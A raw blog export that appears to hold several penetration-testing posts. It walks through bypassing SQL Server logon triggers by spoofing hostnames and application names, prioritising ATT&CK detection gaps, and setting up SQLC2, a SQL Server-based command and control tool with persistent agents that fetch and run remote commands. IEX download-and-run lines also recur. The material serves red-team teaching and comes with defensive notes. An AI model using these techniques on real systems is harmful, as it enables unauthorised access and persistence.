  2. First, let's take a look at the name of the workstation connecting to the SQL Server instance using the command below. By default, it should use the hostname of the workstation connecting to the SQL Server instance.
    SELECT HOST_NAME()
    Img B A E A
  3. Create a logon trigger that only allows white listed hostnames to connect. Execute the trigger exactly as it is shown below.
    -- Create our logon trigger
    CREATE TRIGGER MyHostsOnly
    ON ALL SERVER
    FOR LOGON
    AS
    BEGIN
        IF
        (
            -- White list of allowed hostnames are defined here.
            HOST_NAME() NOT IN ('ProdBox','QaBox','DevBox','UserBox')
        )
        BEGIN
            RAISERROR('You are not allowed to login from this hostname.', 16, 1);
            ROLLBACK;
        END 
    END
    Img B B E De
  4. After setting up the logon trigger you should get an error like the one below when you attempt to login with SSMS again, because you are connecting from a hostname that is not on the white list.Img B C D Dc

Spoofing Hostnames using SSMS

At this point, you might ask, "when would I (an attacker) actually use this in the real world?". Usually it's after you've recovered connection strings from configuration files or decompiled code, and now we want to use that information to connect directly to the backend SQL Server. This is a very common scenario during application penetration tests, but we also find internal applications and configuration files on open file shares during network pentests and red team engagements. Alright, let's spoof our hostname in SSMS.
  1. Open the "Connect Object Explorer" in SSMS and navigate to options -> "Additional Connection Parameters". From there you can set connection string properties on the fly (super cool). For the sake of this example, we'll set the "Workstation ID" property to "DevBox", which is a hostname we know is white listed. Note: I'll cover a few ways to identify white listed hostnames later.Img B D B Fa
  2. Press connect to login. If you open a query window and check your hostname again it should return "DevBox". This helps further illustrate that we successfully spoofed the hostname.
    SELECT HOST_NAME()
    Img B Da E Fe

Spoofing Hostnames using Connection Strings

Under the hood, SSMS is just building a connection string with our "workstation id" property set. Below is an example of a simple connection string that will connect to a remote SQL Server instance as the current Windows user and select the "Master" database.
Data Source=serverinstance1;Initial Catalog=Master;Integrated Security=True;
If the logon trigger we showed in the last section was implemented, we should see the "failed to connect" message. However, if you set the "Workstation ID" property to an allowed hostname you would be allowed to log in.
Data Source=serverinstance1;Initial Catalog=Master;Integrated Security=True;Workstation ID = DevBox;

Spoofing Hostnames using PowerUpSQL

I've also added the "WorkstationId" option to the Get-SQLQuery function of PowerUpSQL. I will be working toward retrofitting the other functions once I find some more time. For now, below is an example showing how to bypass the logon trigger we created in the previous section.
  1. Open Powershell and load PowerUpSQL via your preferred method. The example below shows how to load it from GitHub directly.
    IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/PowerUpSQL/master/PowerUpSQL.ps1")
  2. The initial connection fails due to the trigger restrictions. Note that "-ReturnError" flag needs to be set to view the error returned by the server.
    Get-SQLQuery -Verbose -Instance MSSQLSRV04SQLSERVER2014 -Query "SELECT host_name()" -ReturnError
    Img B E Ecbd
  3. Now set the workstationid option to "DevBox" and you should be able to execute the query successfully.
    Get-SQLQuery -Verbose -Instance MSSQLSRV04SQLSERVER2014 -Query "SELECT host_name()" -WorkstationId "DevBox"
    Img B E Fc C
  4. To remove the trigger you can issue the command below.
    Get-SQLQuery -Verbose -Instance MSSQLSRV04SQLSERVER2014 -WorkstationId "DevBox" -Query 'DROP TRIGGER MyHostsOnly on all server'

Creating a Logon Trigger to Restrict Applications

Below are instructions for setting up a trigger in your home lab that restricts access based on the connecting application name.
  1. Log into your new SQL Server instance as a sysadmin using SSMS.
  2. First, let's take a look at the name of the application connecting to the SQL Server instance using the command below. It should return "Microsoft SQL Server Management Studio – Query".
    SELECT APP_NAME()
    Img B A E Abd
  3. Create a logon trigger that only allows white listed applications to connect. Execute the trigger exactly as it is shown below.
    CREATE TRIGGER MyAppsOnly
    ON ALL SERVER
    FOR LOGON
    AS
    BEGIN
         IF
         (
              -- Set the white list of application names here
              APP_NAME() NOT IN ('Application1','Application2','SuperApp3000','LegacyApp','DevApp1')
         )
         BEGIN
              RAISERROR('You are not allowed to login from this application name.', 16, 1);
              ROLLBACK;
         END
    END
    Img B Ed
  4. After setting up the logon trigger you should get an error like the one below when you attempt to login with SSMS again, because you are connecting from an application that is not on the white list.

    Img B Aaebe

Spoofing Application Names using SSMS

Once again, you might ask, "when would I actually use this in the real world?". Some applications have their name statically set in the connection string used to connect to the SQL Server. Similar to hostnames, we find them in configurations files and source code. It's actually pretty rare to see a logon trigger restrict access by application name, but we have seen it a few times. Alright, let's spoof our appname in SSMS.
  1. Open the "Connect Object Explorer" in SSMS and navigate to options -> "Additional Connection Parameters". From there you can set connection string properties on the fly (super cool). For the sake of this example we'll set the "application name" property to "SuperApp3000", which is a application name we know is white listed. Note: I'll cover a few ways to identify white listed application names later.

    Img B A

  2. Press connect to login. If you open a query window and check your application name again it should return "SuperApp3000". This helps further illustrate that we successfully spoofed the hostname.
    SELECT APP_NAME()
    Img B Bf A E

Spoofing Application Names using Connection Strings

As I mentioned in the last section, there is a connection string property named "AppName" that can be used by applications to declare their application name to the SQL Server. Below are a few example of accepted formats. Application Name =MyApp
Data Source=serverinstance1;Initial Catalog=Master;Integrated Security=True;
ApplicationName =MyApp
Data Source=serverinstance1;Initial Catalog=Master;Integrated Security=True;
AppName =MyApp
Data Source=serverinstance1;Initial Catalog=Master;Integrated Security=True;
"

Spoofing Application Names using PowerUpSQL

To help illustrate the application name spoofing scenario, I've updated the Get-SQLQuery function of PowerUpSQL to include the "appname" option. I will be working toward retrofitting the other functions once I find some more time. Below is a basic example for now.
  1. Open Powershell and load PowerUpSQL via your preferred method. The example below shows how to load it from GitHub directly.
    IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/PowerUpSQL/master/PowerUpSQL.ps1")
  2. PowerUpSQL functions wrap .NET SQL Server functions. When connecting to SQL Server programmatically with .NET, the "appname" property is set to ".Net SqlClient Data Provider" by default. However, since we created a new logon trigger that restricts access by "appname" we should get the following error.
    Get-SQLQuery -Verbose -Instance MSSQLSRV04SQLSERVER2014 -Query "SELECT app_name()" -ReturnError
    Img B E E C
  3. Now set the "appname" property to "SuperApp3000" and you should be able to execute the query successfully.
    Get-SQLQuery -Verbose -Instance MSSQLSRV04SQLSERVER2014 -Query "SELECT app_name()" -AppName SuperApp3000
    Img B E C
  4. To remove the trigger you can issue the command below.
    Get-SQLQuery -Verbose -Instance MSSQLSRV04SQLSERVER2014 -AppName SuperApp3000 -Query 'DROP TRIGGER MyAppsOnly on all server'
  5. Now you can connect without having to spoof the application name.
    Get-SQLQuery -Verbose -Instance MSSQLSRV04SQLSERVER2014  -Query 'SELECT APP_NAME()'
    Img B E E E
  6. Or you can just spoof any application name for the fun of it.
    Get-SQLQuery -Verbose -Instance MSSQLSRV04SQLSERVER2014 -AppName EvilClient -Query 'SELECT APP_NAME()'
    Img B E

Finding White Listed Hostnames and Application Names

If you're not sure what hostnames and applications are in the logon trigger's white list, below are a few options for blindly discovering them.
  1. Review the Logon Trigger Source Code The best way to get a complete list of the hostnames and applications white listed by a logon trigger is to review the source code. However, in most cases this requires privileged access.
    SELECT    name,
    OBJECT_DEFINITION(OBJECT_ID) as trigger_definition,
    parent_class_desc,
    create_date,
    modify_date,
    is_ms_shipped,
    is_disabled
    FROM sys.server_triggers  
    ORDER BY name ASC
    Img B Ef A A
  2. Review Application Code for Hardcoded Values Sometimes the allowed hostnames and applications are hardcoded into the application. If you are dealing with a .NET or Java application, you can decompile and review the source code for keywords related to the connection string they are using. This approach assumes that you have access to application assemblies or configuration files. JD-GUI and DNSPY can come in handy.
  3. Review Application Traffic Sometimes the allowed hostnames and applications are grabbed from the database server when the application starts. As a result, you can use your favorite sniffer to grab the list. I've experienced this a few times. You may ask, why would anyone do this? The world may never know.
  4. Use a List of Domain Systems If you already have a domain account, you can query Active Directory for a list of domain computers. You can then iterate through the list until you come across one that allows connections. This assumes that the current domain user has the privileges to login to SQL Server and the white listed hostnames are associated with the domain.
  5. Use MITM to Inventory Connections You can also perform a standard ARP based man-in-the-middle (MITM) attack to intercept connections to the SQL Server from remote systems. If the connection is encrypted (default since SQL Server 2014) you won't see the traffic, but you'll still be able to see which hosts are connecting. Naturally other MITM techniques could be used as well. Warning: If certificate validation is being done this could result in dropped packets and have an impact to a production system, so please use that approach with caution.

General Recommendations

  • Don't use logon triggers to restrict access to SQL Server based on information that can be easily changed by the client.
  • If you wish restrict access to an allowed list of systems, consider using network or host level firewall rules instead of logon triggers.
  • Consider limiting access to the SQL Server based on user groups and assigned permissions instead of using logon triggers.

Wrap Up

In this blog I covered a few ways to leverage lesser known connection string properties to bypass access restrictions being enforced by SQL Server logon triggers. Hopefully this will be useful if you have to perform a penetration test of a legacy desktop application down the line. If nothing else, hopefully the blog highlighted a few things to avoid when building two-tiered desktop applications. For those who are interested, I've also updated the "SQL Server Connection String Cheatsheet" here.

References

[post_title] => Bypassing SQL Server Logon Trigger Restrictions [post_excerpt] => This shows how to bypass SQL Server logon trigger restrictions by spoofing hostnames and application names using lesser known connection string properties. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => bypass-sql-logon-triggers [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:54:23 [post_modified_gmt] => 2021-06-08 21:54:23 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=9216 [menu_order] => 468 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [30] => WP_Post Object ( [ID] => 9101 [post_author] => 17 [post_date] => 2018-06-12 07:00:16 [post_date_gmt] => 2018-06-12 07:00:16 [post_content] => As Adversarial Simulation continues to gain momentum, more companies are performing full evaluations of their technical detective control capabilities using tools like the Mitre ATT&CK Framework.  While this is a great way for internal security teams to start developing a detective control baseline, even mature organizations find themselves with dozens of detective capability gaps to follow up on.  So, the natural question we hear from clients is “What is the best way to prioritize and streamline our remediation efforts?”.   In this blog I’ll provide a few tips based on my experiences. Before I go down that road, I wanted to take a moment to touch on how I’m qualifying adversarial simulation in this context.  Feel free to SKIP AHEAD to the actual tips.

Adversarial Simulation

To better answer the questions, “What are attackers doing?” and “What should we be looking for?”, internal security teams started to document what techniques were being used by malware, red teams, and penetration testers at each phase of the Cyber Kill Chain.  This inventory of techniques could then be used to baseline detection capabilities.  As time went on, projects like the Mitre ATT&CK Framework started to gain more favor with both the red and the blue teams. Out of this shared adoption of an established and public framework, Adversarial Simulation began to grow in popularity.  Similar to the term “red team”, “Adversarial Simulation” can mean different things to different people. In this context, I’m defining it as “Measuring the effectiveness of existing technical detective controls using a predefined collection of security unit tests”. The goal of this type of testing is to measure the company's ability to identify known Tools Techniques and Procedures (TTPs) related to the behavior of attackers that have already obtained access to the environment in an effort to build/maintain a detective control baseline. After conducting multiple Adversarial Simulation exercises with small, medium, and large organizations, one thing became very apparent.  If your company hasn’t performed adversarial simulation testing before, then you’re likely to have a quite a few gaps at each phase of the cyber kill chain. At first this can seem overwhelming, but it is something that you can triage, prioritize, and manage. The rest of this blog covers some triage options for those companies going through that now.

Using MITRE ATT&CK as a Measuring Stick

The MITRE ATT&CK framework defines categories and techniques that focus on post-exploitation behavior.  Since the goal is to detect that type of behavior it offers a nice starting point. Img B Ad B

Source: https://attack.mitre.org/

While this is a good place to start measuring your detective and preventative controls, it’s just a starting point.  ATT&CK doesn’t cover a lot of technologies commonly found in enterprise environments, and not all the techniques covered will be applicable to your environment. Many of the internal security teams we work with have started adopting the ATT&CK framework to some degree. The most common process we see them using has been outlined below:
  • Start with the entire framework
  • Remove techniques that are not applicable to your environment
  • Add techniques that are specific to technologies in your environment
  • Add techniques that are not covered, but are well known
  • Work through one category at a time
  • Test one technique at a time
  • Assess the SOC team’s ability to detect the technique
  • Identify artifacts, identify data sources used for TTP discovery, and create SIEM rules
  • Document technique coverage
  • Rinse, lather, and repeat.
While there are some commercial products and services available to support this process we have also seen some great open source projects.  The Threat Hunter Playbook created by Roberto Rodriguez is at the top of my recommended reading list.  It includes lots of useful tools to help internal teams get rolling.  You can find it on github: https://github.com/Cyb3rWard0g/ThreatHunter-Playbook When we work with clients, we typically measure the applicable techniques in all phases to provide insight into their ability to detect them within each of the post-exploitation attack phases defined in the ATT&CK framework.   However, sometimes that can be information overload so starting with a few key categories of techniques can be a nice way to kick things off.   Clients usually prefer to prioritize around execution, defense evasion, and exfiltration, because they essentially represent the beginning and end of a basic attack workflow.  Also, when evaluating exfiltration techniques, you implicitly cover some the more common controls channels. Below is a sample of the summary data that can shake loose when looking at the whole picture. Img B B F D F At first glance this can seem alarming, but the sky is not falling.  Keep in mind that the technologies and processes to identify the TTPs for post exploitation are still trying to catch up to attackers.  The first step to getting better is being honest about what you can and can’t do. That way you’ll have the information you need to create a prioritized roadmap that can give you more coverage in a shorter period of time for less money (hopefully).

Remediation Prioritization Tips

The goal of these tips is to reduce the time/dollar investment required to improve the effectiveness of the current controls and your overall ability to detect known and potential TTPs. To start us off I wanted to note that you can’t alert on the information you don’t have.  As a result, missing data sources often map directly to missing alerts in specific categories.

Prioritizing Data Sources

As I mentioned before, data sources are what fuel your detective capabilities.  When choosing to build out a new data source or detective capability, consider prioritizing around those that have the potential to cover the highest number of techniques across all ATT&CK framework categories. For example, netflow data can be used identify:
  • Generic scanning activity
  • Authenticated scanning
  • ICMP and DNS tunnels
  • Large file downloads and uploads
  • Long login sessions
  • Reverse shell patterns
  • Failed egress attempts
I’m sure there are more use cases, but you get the idea. Naturally, you should inventory and track your known data sources and be conscious of what your data source gaps are.   One way to help make sure that gap list is fleshed out is to identify potential data sources based on what techniques don’t generate any alerts. Below is a basic pie chart showing how that type of data can be represented.  It summarizes the level of visibility for techniques that did not generate a security alert. The identified detection gaps fall into 1 of 5 detection levels.  Unknown, Undetected, Partially Logged, Logged, and Partially Detected. Img B B F A Existing Data Sources From this we can see that 60% of the techniques that didn’t generate an alert still left traces in logs. By pulling in that log data we can almost immediately start working on correlations and alerts for many of the associated attack techniques. That by itself should have some influence on what you start with when building out new detections. Missing Data Sources The other 40% represent missing or misconfigured data sources.  Using the list of associated techniques and information from Mitre we can determine potential data sources, and which ones would provide coverage for the largest number of techniques.  If you’re not sure what data sources are associated with which techniques, you can find it on Mitre website.  Below is an example that illustrates some of the information available for the Accessibility Features in Windows. Img B B C Cd

Source: https://attack.mitre.org/wiki/Technique/T1015

To streamline your lookups, consider using invoke-ATTACKAPI, by Roberto Rodriguez.  It can be downloaded from https://github.com/Cyb3rWard0g/Invoke-ATTACKAPI.  Below is a sample PowerShell script the uses Invoke-ATTACKAPI to get a list of the data sources that can be used to identify multiple attack techniques.  To increase its usefulness, you could easily modify it to only include the attack techniques that you know your blind to. Note: All of your data sources may not be covered by the framework, or they may use different language to describe them.
# Load script from github and sync
iex(New-Object net.webclient).DownloadString("https://raw.githubusercontent.com/Cyb3rWard0g/Invoke-ATTACKAPI/master/Invoke-ATTACKAPI.ps1")

# Group data sources
$AllTechniques = Invoke-ATTACKAPI -All
$AllTechniques | Where-Object platform -like "Windows" | Select "Data Source",TechniqueName -Unique |
ForEach-Object {

$TechniqueName = $_.TechniqueName
$_."Data Source" | ForEach-Object {

$Object = New-Object PSObject
$Object | add-member Noteproperty TechniqueName $Technique
$Object | add-member Noteproperty DataSource $_
$Object
}

} | Select TechniqueName,DataSource | Group-Object DataSource | Sort-Object count -Descending
Img B Ae A F From the command results, you can quickly see that “Process Monitoring” and a few others can be incredibility powerful data sources for detecting the techniques in the Mitre ATT&CK Framework.

Prioritizing Techniques by Tactic

Command execution and defense evasion techniques occur at the beginning, and throughout the kill chain.  As such, having deeper visibility into these techniques can help mitigate risk associated with some of the visibility gaps in later attack phases; such as persistence, lateral movement, and credentials gathering by detecting potentially malicious behavior sooner. Below I reorganized the ATT&CK categories from our previous example test results to illustrate the point.

Img B Ad E C

Command Execution Attackers often employ non-standard command execution techniques that leverage native applications to avoid application white list controls.  Many of those techniques are not commonly used by legitimate users, so the commands themselves can be used as reliable indicators of malicious behavior. For example, most users don’t use regsvr32.exe, regsvcs.exe, or msbuild.exe at all.  When they are used legitimately, it’s rare that they use the same command options as attackers.  For some practical examples check out the atomic-red-team repo on github: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/windows-index.md Defense Evasion Similar to command execution, attackers often employ defense evasion techniques that do not represent common user behavior.  As a result, they can be used as reliable indicators of malicious behavior. Lateral Movement Not every attacker performs scanning, but a lot of them do. If you can accurately identify generic scanning and authenticated scanning behavior through netflow data and Windows authentication logs you have a pretty good chance of detecting them.  If you have the data sources, but alerts aren’t configured, it’s worth the effort to close the gap.  Sean Metcalf shared a presentation that covers some information on the topic (among other things) that can be found here. Ideally it will help you identify potentially malicious movement before the attackers reach their target and start exfiltration. Exfiltration If you missed the attacker executing commands on the endpoints, looking for common malicious behaviors and anomalies in outbound traffic and internet facing systems can yield some valuable results (assuming you have the right data sources). Most people are familiar with the common controls channels, but for those who are not, below is a short list:
  • ICMP, SMTP, SSH, and DNS tunnels
  • TCP/UDP reverse shells (over various ports/protocols)
  • TCP/UDP beacons (over various ports/protocols)
  • Web shells

Prioritizing Techniques by Utility

Developing detections for techniques that are used in multiple attack phases can give you a better return on your time/dollar investments.  For example, scheduled tasks can be used for execution, persistence, privilege escalation, and lateral movement. So, when you have the ability to identify high risk tasks that are being created, you can kill three birds with one stone. (Note: No birds were actually killed in the making of this blog.) Below is a sample PowerShell script the uses Invoke-ATTACKAPI to get a list of the techniques used in multiple attack categories.  To increase its usefulness, you could easily modify it to only include the attack techniques that your blind to.
# Load script from github and sync
iex(New-Object net.webclient).DownloadString("https://raw.githubusercontent.com/Cyb3rWard0g/Invoke-ATTACKAPI/master/Invoke-ATTACKAPI.ps1")

# Grab and group the techniques
$AllTechniques = Invoke-ATTACKAPI -All
$AllTechniques | Where-Object platform -like "Windows" | Select Tactic,TechniqueName -Unique |
ForEach-Object {

$Technique = $_.TechniqueName
$_.tactic | ForEach-Object {

$Object = New-Object PSObject
$Object | add-member Noteproperty TechniqueName $Technique
$Object | add-member Noteproperty Tactic $_
$Object
}
} | Select TechniqueName,Tactic | Group-Object TechniqueName | Sort-Object count -Descending | select Count, Name -Skip 1
Img B Ae Da Once again you can see that some of the techniques can be used in more phases than others.

Prioritizing Techniques by (APT) Group

The ATT&CK framework also includes information related to well-known APT groups and campaigns at https://attack.mitre.org/wiki/Groups.   The groups are linked to techniques that were used during campaigns.  As a result, we can see what techniques are used by the largest number of (APT) groups using the Invoke-ATTACKAPI Powershell script below.
#Load script from github and sync
iex(New-Object net.webclient).DownloadString("https://raw.githubusercontent.com/Cyb3rWard0g/Invoke-ATTACKAPI/master/Invoke-ATTACKAPI.ps1

#Techniques used by largest number of APT groups
$AllTechniques = Invoke-ATTACKAPI -All
$AllTechniques | Where-Object platform -like "Windows" | Select Group,TechniqueName -Unique | 
Where group -notlike "" | Group-Object TechniqueName | Sort-Object count -Descending
Img B F A Bb To make it more useful, filter for group names that are more relevant to your industry.  At the moment I don't think the industries or countries targeted by the groups are available as meta data in the ATT&CK framework.  So for now that part may be a manual process.  Either way, big thanks to Jimi for the tip!

Prioritizing Based on Internal Policies and Requirements

Understanding your company’s priorities and policies should always influence your choices. However, if you are going to follow those policies, make sure that the language is well defined and understood. For example, if you have an internal policy that states you must be able to detect all known threats, then “known threats” needs to be defined and expectations should be set as to how the list of known threats will be maintained. Like vulnerability severity ranking, you should also create a system for ranking detective control gaps.  That system should also define how quickly the company will be required to develop a detective capability either through existing controls, new controls, or process improvements.

Bridging the Gap with Regular Hunting Exercises

Regardless of how you prioritize the development of your detective capabilities, things take time.  Collecting new data sources, improving logging, improving SIEM data ingestion/rules for all of your gaps is rarely a quick process. While you're building out that automation consider keeping an eye on known gaps via regular hunting exercises. We've seen a number of clients leverage well defined hunts to yield pretty solid results.  There was a nice presentation by Jared Atkinson and a recent paper by Paul Ewing/Devon Kerr from Endgame that are worth checking out if you need a jump start.

Wrap Up

Just like preventative controls, there is no such thing as 100% threat detection. Tools, techniques, and procedures are constantly changing and evolving.  Do the best you can with what you have.  You’ll have to make choices based on perceived risks and the ROI of your security control investments in the context of your company, but hopefully this blog with help make some of the choices easier.  At the end of the day, all of my recommendations and observations are limited to my experiences and the companies I’ve worked with in the past.  So please understand that while I’ve worked with quite a few security teams, I still suffer from biases like everyone else.  If you have other thoughts or recommendations, I would love to hear them.  Feel free to reach out in the comments. Thanks and good luck!

References

[post_title] => Prioritizing the Remediation of Mitre ATT&CK Framework Gaps [post_excerpt] => In this blog I’ll share a few tips for prioritizing the remediation of detective control gaps related to the Mitre ATT&CK Framework. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => prioritizing-the-remediation-of-mitre-attck-framework-gaps [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:54:07 [post_modified_gmt] => 2021-06-08 21:54:07 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=9101 [menu_order] => 470 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [31] => WP_Post Object ( [ID] => 8944 [post_author] => 17 [post_date] => 2018-05-25 07:00:51 [post_date_gmt] => 2018-05-25 07:00:51 [post_content] => There is no shortage of dependable control channels or RATs these days, but I thought it would be a fun side project to develop one that uses SQL Server. In this blog, I’ll provide an overview of how to create and maintain access to an environment using SQL Server as the controller and the agent using a new PoC script called SQLC2. It should be interesting to the adversarial simulation, penetration testing, red, purple, blue, and orange? teams out there looking for something random to play with.  Did I miss any marketing terms?

Why SQL Server?

Well, the honest answer is I just spend a lot of time with SQL Server and it sounded fun.  However, there are practical reasons too.  More companies are starting to use Azure SQL Server databases. When those Azure SQL Server instances are created, they are made accessible via a subdomain of “*.database.windows.net” on port 1433. For example, I could create an SQL Server instance named “mysupersqlserver.database.windows.net”. As a result, some corporate network configurations allow outbound internet access to any “*.database.windows.net” domain on port 1433. So, the general idea is that as Azure SQL Server adoption grows, there will be more opportunity to use SQL Server as a control channel that looks kind of like normal traffic .

SQLC2 Overview

SQLC2 is a PowerShell script for deploying and managing a command and control system that uses SQL Server as both the control server and the agent. Basic functionality includes:
  • Configuring any SQL Server to be a controller
  • Installing/Uninstalling PowerShell and SQL Server based SQLC2 agents on Windows systems
  • Submitting OS commands remotely
  • Recovering OS command results remotely
SQLC2 can be downloaded from https://github.com/NetSPI/SQLC2/. At its core, SQLC2 is just a few tables in an SQL Server instance that tracks agents, commands, and results. Nothing too fancy, but it may prove to be useful on some engagements.  Although this blog focuses on using an Azure SQL Server instance, you could host your own SQL Server in any cloud environment and have it listen on port 443 with SSL enabled. So, it could offer a little more flexibility depending on how much effort you want to put into it. Naturally, SQLC2 was built for penetration test and red team engagements but be aware that for this release I didn’t make a whole lot of effort to avoid blue team detection. If that’s your goal, I recommend using the “Install-SQLC2AgentLink” agent installer instead of “Install-SQLC2AgentPs”. The link agent operates almost entirely at the SQL Server layer and doesn’t use any PowerShell so it's able to stay under the radar more than the other supported persistence methods. Below is a diagram illustrating the SQLC2 architecture.

Img B B

For those who are interested, below I’ve provided an overview of the Azure setup, and a walkthrough of the basic SQLC2 workflow. Enjoy!

Setting Up an SQL Server in Azure

I was going to provide an overview of how to setup an Azure database but  Microsoft has already written a nice article on the subject. You can find it at https://docs.microsoft.com/en-us/azure/sql-database/sql-database-get-started-portal.

SQLC2: Installing C2 Server Tables

The SQLC2 controller can be installed on any SQL Server by creating two tables within the provided database.  That database will then be used in future commands to check-in agents, download commands, and upload command results. Below is the command to setup the SQLC2 tables in a target SQL instance.
Install-SQLC2Server -Verbose -Instance sqlserverc21.database.windows.net -Database test1 -Username CloudAdmin -Password 'BestPasswordEver!'
Sqlc Install Sqlc Server You can use the SQLC2 command below to check which agents have phoned home. However,  there wont be any agents registered directly after the server installation.
Get-SQLC2Agent -Verbose -Instance sqlserverc21.database.windows.net -Database test1 -Username CloudAdmin -Password 'BestPasswordEver!'
Sqlc Checkforregisteredagents Once agents and commands have been processed the actual C2 tables will simply store the data.  You can also connect directly to your Azure SQL Server with SQL Server Management Studio to view the results as well.  Below is an example screenshot.

Img B Faddd B

SQLC2: Installing C2 Agents

SQLC2 supports three methods for installing and running agents for downloading and executing commands from the C2 server.
  1. Direct Execution: Executing directly via the Get-SQLC2Command
  2. Windows Schedule Task: Installing an SQLC2 PowerShell agent to run via a scheduled task that runs every minute.
  3. SQL Server Agent Job: Installing an SQLC2 SQL Server agent job that communicates to the C2 server via a server link.

Option 1:  Direct Execution

You can list pending commands for the agent with the command below.   All Get-SQLC2Command execution will automatically register the agent with the C2 server.
Get-SQLC2Command -Verbose -Instance sqlserverc21.database.windows.net -Database test1 -Username CloudAdmin -Password 'BestPasswordEver!'
Sqlc Registersystem Checkforcommands Adding the -Execute flag with run pending commands.
Get-SQLC2Command -Verbose -Execute -Instance sqlserverc21.database.windows.net -Database test1 -Username CloudAdmin -Password 'BestPasswordEver!'
Sqlc Registersystem Checkforcommandsandrunthem The examples above show how to run SQLC2 commands manually. However, you could have any persistence method load SQLC2 and run these commands to maintain access to the environment.

Option 2:  Windows Scheduled Task

Installing an SQLC2 PowerShell agent to run via a scheduled task that runs every minute. Note: Using the -Type parameter options you can also install persistence via "run" or "image file execution options" registry keys.
Install-SQLC2AgentPs -Verbose -Instance sqlserverc21.database.windows.net -Database test1 -Username CloudAdmin -Password 'BestPasswordEver!'
Sqlc Persistpsinstall It can be uninstalled with the command below:
Uninstall-SQLC2AgentPs -Verbose
Sqlc Persistpsuninstall

Option 3:  SQL Server Agent Job

Installing an SQLC2 SQL Server agent job that communicates to the C2 server via a server link.
Install-SQLC2AgentLink -Verbose -Instance 'MSSQLSRV04SQLSERVER2014' -C2Instance sqlserverc21.database.windows.net -C2Database test1 -C2Username CloudAdmin -C2Password 'BestPasswordEver!'
Sqlc Installlinkpersist For those who are interested, I've also provided a TSQL version of the SQL Server agent installer you can find at https://github.com/NetSPI/SQLC2/blob/master/tsql/Install-SQLC2AgentLink.sql. It can be uninstalled with the command below.
Uninstall-SQLC2AgentLink -Verbose -Instance 'MSSQLSRV04SQLSERVER2014'
Sqlc Installlinkpersistremove

SQLC2: Issuing OS Commands

To send a command to a specific agent, you can use the command below. Please note that in this release the agent names are either the computer name or sql server instance name the agent was installed on.  Below are a few command examples showing a registered agent and issuing a command to it.
Get-SQLC2Agent -Verbose -Instance sqlserverc21.database.windows.net -Database test1 -Username CloudAdmin -Password 'BestPasswordEver!'
Sqlc Agentischeckin
Set-SQLC2Command -Verbose -Instance sqlserverc21.database.windows.net -Database test1 -Username CloudAdmin -Password 'BestPasswordEver!' -Command "Whoami" -ServerName MSSQLSRV04
Sqlc Set Command For Agent

SQLC2: Get Command Results

Below is the command for actually viewing the command results. It supports filters for servername, command status, and command id.
Get-SQLC2Result -Verbose -ServerName "MSSQLSRV04" -Instance sqlserverc21.database.windows.net -Database test1 -Username CloudAdmin -Password 'BestPasswordEver!'
Sqlc Getcommandresults

SQLC2: Uninstalling C2 Tables

Below are some additional commands for cleaning up when you done.  They include commands to clear the command history table, clear the agent table, and remove the C2 tables all together.
Clear command history:
Remove-SQLC2Command -Verbose -Instance sqlserverc21.database.windows.net -Database test1 -Username CloudAdmin -Password 'BestPasswordEver!'
Clear agent list:
Remove-SQLC2Agent -Username c2admin -Password 'SqlServerPasswordYes!' -Instance sqlserverc21.database.windows.net -Database test1 -Verbose
Remove SQLC2 tables:
Uninstall-SQLC2Server -Verbose -Instance sqlserverc21.database.windows.net -Database test1 -Username CloudAdmin -Password 'BestPasswordEver!'

Blue Team Notes

  • The PowerShell commands and agents should show up in your PowerShell logs which can be a useful data source.
  • The persistence methods for tasks, registry run keys, and "image file execution options" registry keys can all be audited, and alerts can be configured. The commands used to create the persistence also tend to generate Windows event logs can all be useful and most Endpoint Detection and Response solutions can identify the commands at execution time.
  • If possible, deploy audit configurations to internal SQL Servers to help detect rogue agent jobs, ad-hoc queries, and server links. I have some old examples of logging options here. If configured correctly they can feed alert directly into the Windows event log.
  • Although it’s harder than it sounds, try to understand what’s normal for your environment. If you can restrict access to “*.database.windows.net” to only those who need it, then it can be an opportunity to both block outbound access and detect failed attempts.  Network and DNS logs can come in handy for that.

Wrap Up

SQLC2 is a pretty basic proof of concept, but I think it’s functional enough to illustrate the idea.  Eventually, I'll likely role it into PowerUpSQL for the sake of keeping the offensive SQL Server code together. At that point, maybe I'll also role in a few CLR functions to step it up a bit.  In the meantime, for those of you looking to explore more offensive cloudscape options, check out Karl Fosaaen’s blog on other Azure services that can be useful during red team engagements. It's pretty interesting. [post_title] => Databases and Clouds: SQL Server as a C2 [post_excerpt] => This blog will provide an overview of how to create and maintain access to an environment using SQL Server as the controller and the agent using a new PoC script called SQLC2. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => databases-and-clouds-sql-server-as-a-c2 [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:53:45 [post_modified_gmt] => 2021-06-08 21:53:45 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=8944 [menu_order] => 472 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [32] => WP_Post Object ( [ID] => 8743 [post_author] => 17 [post_date] => 2018-05-08 07:00:43 [post_date_gmt] => 2018-05-08 07:00:43 [post_content] => This blog walks through how to quickly identify SQL Server instances used by 3rd party applications that are configured with default users/passwords using PowerUpSQL.  I’ve presented on this topic a few times, but I thought it was worth a short blog to help address common questions.  Hopefully it will be useful to penetration testers and internal security teams trying to clean up their environments. Update September 13 , 2018 This is just a quick additional to the original blog.  I added a 15 more default passwords to the Get-SQLServerLoginDefaultPw function.  Details can be found here.

Testing Approach Summary

Default passwords are still one of the biggest issues we see during internal network penetration tests. Web applications are especially neglected, but 3rd party applications that are deployed with their own instance of SQL Server can also go over looked.  Rob Fuller created a nice list of default SQL Server instance passwords in PWNWiki a while back. We were tracking our own list as well, so I glued them together and wrapped a little PowerShell around them to automate the testing process. The high-level process is pretty straight forward:
  1. Create a list of application specific SQL Server instance names and the associated default users/passwords.
